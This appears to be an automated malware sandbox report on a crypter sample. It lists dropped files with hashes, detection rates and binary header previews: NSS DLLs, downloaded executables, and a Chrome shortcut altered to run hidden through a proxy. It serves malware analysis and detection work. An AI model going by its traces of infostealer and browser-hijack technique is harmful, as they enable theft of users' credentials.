SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 08:16:12 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.458789649178605
Encrypted:	false
SSDEEP:	48:8SEdYT5H0lRYrnvPdAKRkdAGdAKRFdAKRz:8SDx7
MD5:	8EF053B55C8F1044FAB725C8DD6745A1
SHA1:	EECBFE81201BB3E26A3C2DB0ABB130084CE5E2FE
SHA-256:	A8A2FEF79CA2A22652A4F8D4408A833E5B65BB7B3C20AC33C0A5CB0737530C27
SHA-512:	942D2543593D5E7EF73CEAF6A4115D51206DD3F7A81E622659EA0AC991E81FAF335F38B4B692FC1DDE7F369DE211FA2DD8A2A5C2925CFC800A828DDDF23A2AAA
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,.......l....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.IEW.I....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.VEW.F....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.VEW.F.............................A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.I..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:	24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 33%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JxvL46JFox50ORU3tEsaxZ2Y.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LeVSNPB9FLpXmtLG7mcICpEf.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RK8ajtyf9pvKlaXEo3EjTbnu.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zt2eeOHcoNwxYT3C9R8h67os.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.3554278163807965
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAt92n4M9XKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:ML9E4Ke84qXKDE4KhKiKhIE4Ks
MD5:	783B5197F36053BBA046C2EF2515F80E
SHA1:	49CB890E4C6536FD79EF1C7BE83949509B37A824
SHA-256:	9513A3E5E55C5471F606E5E0B06C46CD4E357F46602BBF43F24E1E70572F5F91
SHA-512:	6ACD461D38A8F665E6CF4B585B720ABEB0B3F8556C817E576991DF758D9FFE68479B2E634EB60223C7B7909F34C7A1853F13F0CEE3CB4F7C5951228A91BE24C4
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kCxbYlQ2A6NZXLbKZjtnUx3R.exe.log

Download File

Process:	C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000014.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	102264
Entropy (8bit):	4.028223287331754
Encrypted:	false
SSDEEP:	1536:p9kaAukHQNNT+LivhTirG6ndC0FbGKYYJ2:vkaAuGQNNT5hTig0Fb0d
MD5:	EA57692D44BF7E6B6EB80415028C1C84
SHA1:	2FCE0466357C4DCB5624DA0BF6297EF4B9C280BF
SHA-256:	56109F1D25270057D1E78FAC307515BA8C032D86B14CAB4C149E6F5198ABE41A
SHA-512:	0B6B68C0E3F5812936D2E8DFCE1D6711A4F5E3544FBB2EDBD5ADD720A4E6D45BD6BCFFB27B9AAC3A20EF4F988FD00FC801D612C681721D9EB6947EE272E369FA
Malicious:	false
Reputation:	unknown
Preview:	....h... ...x...P.......P...........P...X.......]..................(...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	104952
Entropy (8bit):	4.012147982809804
Encrypted:	false
SSDEEP:	1536:jkDyzoITtxWZYlphQimWGTn2VwFDKjv3YWG5:jkDykITtxWshQi9wFEv3Yp
MD5:	CE6C7972094CF69027BACEE32E915334
SHA1:	C9247D8E77FD56CBF055C4BB3B549231AEF5AFFB
SHA-256:	07907E72AD9A42A54DCBD12AB7138201C24C144E2BAE50BBA589FF48C7E9F9B3
SHA-512:	773FCDC24ACB1FB05989E3E98AC5D5F7549D631948DDB1D08ACC94C2F71DE122CA34F03A173C6E89E1510AA290F9F9103BC5E98C1E3D537EB9BE26CB0EF6BDFE
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P..............X...(...]...X...................V.......e.n.-.C.H.;.e.n.-.G.B...............x..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11496960
Entropy (8bit):	7.95681767955623
Encrypted:	false
SSDEEP:	196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
MD5:	D60D266E8FBDBD7794653ECF2ABA26ED
SHA1:	469ED7D853D590E90F05BDF77AF114B84C88DE2C
SHA-256:	D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
SHA-512:	80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54% Antivirus: Virustotal, Detection: 64%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	363424
Entropy (8bit):	7.987313898927024
Encrypted:	false
SSDEEP:	6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
MD5:	384A847AD2833788FA253433FD2EEA8D
SHA1:	1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
SHA-256:	DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
SHA-512:	BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 70%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.\|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423328
Entropy (8bit):	7.9889468260390535
Encrypted:	false
SSDEEP:	6144:ruFHcG6dc0A3+yfikluZRt6wfSYZc6pNLuvFJzPmhsiqvK5XEHAkgDkJEO:rCL3+YllubttfS16pNuTUqi1EE2EO
MD5:	A463E516041F4BC84F03BC8FE2B643DD
SHA1:	5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
SHA-256:	68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
SHA-512:	5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 40%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H......................................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	415943
Entropy (8bit):	7.9904721611397775
Encrypted:	true
SSDEEP:	6144:rBrkDIY0uBcDXK+KgEqBG7nkmfVRSG5rO4lNhCV6JRIc+9dIbCtWeJAH:oNgYLkm9RSYbNhu6DS9dIbufy
MD5:	D399F8ABCA97B04F273F04322E4378BE
SHA1:	C62B4FA298116B3DD6943E950C8DFF80BA8AC64C
